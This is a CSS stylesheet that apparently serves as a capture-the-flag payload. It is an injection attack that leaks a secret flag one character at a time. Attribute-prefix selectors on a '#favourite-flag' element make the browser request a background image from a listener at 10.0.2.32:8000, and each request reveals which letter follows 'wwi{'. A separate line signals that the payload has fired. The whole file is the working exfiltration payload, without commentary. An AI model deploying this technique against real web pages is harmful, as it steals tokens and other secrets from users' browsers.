body {background-image: url(http://10.0.2.32:8000/trigger);}
#favourite-flag[data-flag^=wwi\{a] {background-image: url(http://10.0.2.32:8000/a);}
#favourite-flag[data-flag^=wwi\{b] {background-image: url(http://10.0.2.32:8000/b);}
#favourite-flag[data-flag^=wwi\{c] {background-image: url(http://10.0.2.32:8000/c);}
#favourite-flag[data-flag^=wwi\{d] {background-image: url(http://10.0.2.32:8000/d);}
#favourite-flag[data-flag^=wwi\{e] {background-image: url(http://10.0.2.32:8000/e);}
#favourite-flag[data-flag^=wwi\{f] {background-image: url(http://10.0.2.32:8000/f);}
#favourite-flag[data-flag^=wwi\{g] {background-image: url(http://10.0.2.32:8000/g);}
#favourite-flag[data-flag^=wwi\{h] {background-image: url(http://10.0.2.32:8000/h);}
#favourite-flag[data-flag^=wwi\{i] {background-image: url(http://10.0.2.32:8000/i);}
#favourite-flag[data-flag^=wwi\{j] {background-image: url(http://10.0.2.32:8000/j);}
#favourite-flag[data-flag^=wwi\{k] {background-image: url(http://10.0.2.32:8000/k);}
#favourite-flag[data-flag^=wwi\{l] {background-image: url(http://10.0.2.32:8000/l);}
#favourite-flag[data-flag^=wwi\{m] {background-image: url(http://10.0.2.32:8000/m);}
#favourite-flag[data-flag^=wwi\{n] {background-image: url(http://10.0.2.32:8000/n);}
#favourite-flag[data-flag^=wwi\{o] {background-image: url(http://10.0.2.32:8000/o);}
#favourite-flag[data-flag^=wwi\{p] {background-image: url(http://10.0.2.32:8000/p);}
#favourite-flag[data-flag^=wwi\{r] {background-image: url(http://10.0.2.32:8000/r);}
#favourite-flag[data-flag^=wwi\{s] {background-image: url(http://10.0.2.32:8000/s);}
#favourite-flag[data-flag^=wwi\{t] {background-image: url(http://10.0.2.32:8000/t);}
#favourite-flag[data-flag^=wwi\{u] {background-image: url(http://10.0.2.32:8000/u);}
#favourite-flag[data-flag^=wwi\{w] {background-image: url(http://10.0.2.32:8000/w);}
#favourite-flag[data-flag^=wwi\{x] {background-image: url(http://10.0.2.32:8000/x);}
#favourite-flag[data-flag^=wwi\{y] {background-image: url(http://10.0.2.32:8000/y);}
#favourite-flag[data-flag^=wwi\{z] {background-image: url(http://10.0.2.32:8000/z);}